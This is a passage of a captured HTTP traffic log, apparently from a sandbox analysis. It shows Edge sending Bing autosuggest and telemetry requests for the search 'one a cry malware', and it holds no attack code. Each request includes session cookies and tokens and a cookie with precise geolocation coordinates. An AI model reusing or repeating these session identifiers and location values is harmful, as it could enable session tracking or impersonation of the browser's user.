A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malw%2Ci%3A3%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199048585%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malw%2Ci%3A3%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199048608%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20mal%2Ci%3A4%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199048621%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20mal%2Ci%3A4%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199048641%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malwa%2Ci%3A2%22%2C%22AsResponseLength%22%3A%22515%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199048666%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malwar%2Ci%3A1%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199047977%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malwar%2Ci%3A1%22%2C%22AsResponseLength%22%3A%22508%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199048074%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malwar%2Ci%3A1%2Cig%3A95889F87F7E74E968DD87D7C89531C3E%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199048075%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malwa%2Ci%3A2%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199048528%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malwa%2Ci%3A2%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199048549%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malw%2Ci%3A3%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199048585%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malw%2Ci%3A3%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199048608%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20mal%2Ci%3A4%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199048621%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20mal%2Ci%3A4%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199048641%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malwa%2Ci%3A2%22%2C%22AsResponseLength%22%3A%22515%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199048666%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 539
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bc9c8e24b0e91968aa7dadcf0f0
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-EYc6Bh++0BfoykxeVzdQ1Pu7m1kQso/9ajA1QFFmTXA='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:09 GMT
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199049.14919fd4
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20cry%20ma&cp=12&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20cry%20ma&cp=12&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 1015
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bc976594782b95c5041f146a722
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-blAEXG+/w4DNCvtOS1cLxLnA6SfNx9MkuTx7RV1fXVk='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:09 GMT
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199049.1491a037
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20cry%20m&cp=11&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20cry%20m&cp=11&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 811
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bc997eb4f0fbbb4492fb2b8cf76
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-ZQKNNcnBL6wC0KVrNAIo+R5PbDiqXjKzHwDAtpQ8mBc='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:09 GMT
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199049.1491a0ac
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20mal%2Ci%3A2%2Cig%3A251864C0A0BF4AC7901910D728C2782A%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199048667%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20ma%2Ci%3A5%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199048679%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20ma%2Ci%3A5%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199048702%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20m%2Ci%3A6%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199048724%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malw%2Ci%3A3%22%2C%22AsResponseLength%22%3A%22527%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199048736%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20ma%2Ci%3A3%2Cig%3AA157DB38F491414CBB2B6F4BE66B2B32%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199048736%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20m%2Ci%3A6%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199048755%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20mal%2Ci%3A4%22%2C%22AsResponseLength%22%3A%22566%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199048757%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20m%2Ci%3A4%2Cig%3A4FF04328F972439C8647A96DB6CF94C6%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199048760%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20mal%2Ci%3A2%2Cig%3A251864C0A0BF4AC7901910D728C2782A%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199048667%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20ma%2Ci%3A5%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199048679%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20ma%2Ci%3A5%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199048702%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20m%2Ci%3A6%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199048724%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malw%2Ci%3A3%22%2C%22AsResponseLength%22%3A%22527%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199048736%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20ma%2Ci%3A3%2Cig%3AA157DB38F491414CBB2B6F4BE66B2B32%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199048736%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20m%2Ci%3A6%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199048755%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20mal%2Ci%3A4%22%2C%22AsResponseLength%22%3A%22566%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199048757%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20m%2Ci%3A4%2Cig%3A4FF04328F972439C8647A96DB6CF94C6%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199048760%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
